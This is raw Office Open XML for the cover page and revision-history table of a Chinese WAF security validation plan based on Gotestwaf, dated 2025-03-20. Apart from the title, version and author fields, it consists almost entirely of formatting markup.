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3D5EC">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7B6D2D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A46258">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="7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highlight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2229485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1329055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1393190" cy="1124585"/>
            <wp:effectExtent l="0" t="0" r="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19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8BBB5E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA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sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA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WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA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防火墙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA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安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA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防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDB250">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA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sz w:val="72"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA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验证方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798FB09">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2DFCE8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A21188">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i/>
          <w:sz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Gotestwaf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i/>
          <w:sz w:val="28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 Based Security Validation Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA0180">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28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43D03555">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074BFA71">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7C79DF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2574806A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FB323E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highlight w:val="none"/>
        </w:rPr>
        <w:pict>
          <v:shape id="文本框 678" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:0pt;margin-left:-88.15pt;margin-top:494.45pt;height:54pt;width:592.1pt;mso-position-vertical-relative:page;mso-wrap-distance-bottom:0pt;mso-wrap-distance-left:9pt;mso-wrap-distance-right:9pt;mso-wrap-distance-top:0pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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hYE6baAAAADgEAAA8AAAAAAAAAAQAgAAAA&#10;IgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kAC/IcjQgIAAGsEAAAOAAAAAAAAAAEA&#10;IAAAACkBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAADdBQAAAAA=&#10;">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata o:title=""/>
            <o:lock v:ext="edit" aspectratio="f"/>
            <v:textbox style="mso-fit-shape-to-text:t;">
              <w:txbxContent>
                <w:p w14:paraId="11A5278A">
                  <w:pPr>
                    <w:ind w:firstLine="480"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:hint="default" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:b/>
                      <w:color w:val="000000" w:themeColor="text1"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                      <w14:textFill>
                        <w14:gradFill>
                          <w14:gsLst>
                            <w14:gs w14:pos="0">
                              <w14:srgbClr w14:val="007BD3"/>
                            </w14:gs>
                            <w14:gs w14:pos="100000">
                              <w14:srgbClr w14:val="034373"/>
                            </w14:gs>
                          </w14:gsLst>
                          <w14:lin w14:scaled="0"/>
                        </w14:gradFill>
                      </w14:textFill>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:b/>
                      <w:color w:val="000000" w:themeColor="text1"/>
                      <w14:textFill>
                        <w14:gradFill>
                          <w14:gsLst>
                            <w14:gs w14:pos="0">
                              <w14:srgbClr w14:val="007BD3"/>
                            </w14:gs>
                            <w14:gs w14:pos="100000">
                              <w14:srgbClr w14:val="034373"/>
                            </w14:gs>
                          </w14:gsLst>
                          <w14:lin w14:scaled="0"/>
                        </w14:gradFill>
                      </w14:textFill>
                    </w:rPr>
                    <w:t>2025-0</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:b/>
                      <w:color w:val="000000" w:themeColor="text1"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                      <w14:textFill>
                        <w14:gradFill>
                          <w14:gsLst>
                            <w14:gs w14:pos="0">
                              <w14:srgbClr w14:val="007BD3"/>
                            </w14:gs>
                            <w14:gs w14:pos="100000">
                              <w14:srgbClr w14:val="034373"/>
                            </w14:gs>
                          </w14:gsLst>
                          <w14:lin w14:scaled="0"/>
                        </w14:gradFill>
                      </w14:textFill>
                    </w:rPr>
                    <w:t>3</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:b/>
                      <w:color w:val="000000" w:themeColor="text1"/>
                      <w14:textFill>
                        <w14:gradFill>
                          <w14:gsLst>
                            <w14:gs w14:pos="0">
                              <w14:srgbClr w14:val="007BD3"/>
                            </w14:gs>
                            <w14:gs w14:pos="100000">
                              <w14:srgbClr w14:val="034373"/>
                            </w14:gs>
                          </w14:gsLst>
                          <w14:lin w14:scaled="0"/>
                        </w14:gradFill>
                      </w14:textFill>
                    </w:rPr>
                    <w:t>-</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:b/>
                      <w:color w:val="000000" w:themeColor="text1"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                      <w14:textFill>
                        <w14:gradFill>
                          <w14:gsLst>
                            <w14:gs w14:pos="0">
                              <w14:srgbClr w14:val="007BD3"/>
                            </w14:gs>
                            <w14:gs w14:pos="100000">
                              <w14:srgbClr w14:val="034373"/>
                            </w14:gs>
                          </w14:gsLst>
                          <w14:lin w14:scaled="0"/>
                        </w14:gradFill>
                      </w14:textFill>
                    </w:rPr>
                    <w:t>20</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="square"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E816EA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C0BC97">
      <w:pPr>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6049739E">
      <w:pPr>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="292E32A1">
      <w:pPr>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7126CBBE">
      <w:pPr>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DB3EBB">
      <w:pPr>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA52BB9">
      <w:pPr>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA8200A">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE1EB76">
      <w:pPr>
        <w:ind w:firstLine="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none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highlight w:val="none"/>
        </w:rPr>
        <w:t>修订记录</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="88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2286"/>
        <w:gridCol w:w="3864"/>
        <w:gridCol w:w="1667"/>
      </w:tblGrid>
      <w:tr w14:paraId="4ADF9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80" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C12E0CF">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs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4"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2286" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B476852">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs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4"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>生效日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3864" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D7A0D31">
            <w:pPr>
              <w:pStyle w:val="8"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:caps/>
                <w:sz w:val="21"/>
                <w:szCs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4"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>修订概览</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D8D8D8" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E59174C">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="422"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:b/>
                <w:sz w:val="21"/>
                <w:szCs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4"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>修订人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B573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7F2D4258">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21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highlight w:val="none"/>
              </w:rPr>
              <w:t>V1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2286" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0657138C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21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highlight w:val="none"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:highlight w:val="none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sz w:val="21"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>-0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:highlight w:val="none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sz w:val="21"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:highlight w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3864" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="559592C9">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24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highlight w:val="none"/>
              </w:rPr>
              <w:t>创建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="662D1A4F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21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4"/>
                <w:highlight w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>郭秀峰</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="07CEA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0C83AF64">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2286" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32EC3984">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3864" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B673A8C">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="323DCC2D">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B9D4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</w:tcPr>
          <w:p w14:paraId="1CEF6920">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2286" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A0AD52">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3864" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A25DB35">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="795777D6">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1836AA46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E7A48D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2371B61E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087FA3D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5AA1FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="47CE9205">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33108CE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA6D41A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792A6F5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E54A59">
      <w:pPr>
        <w:rPr>
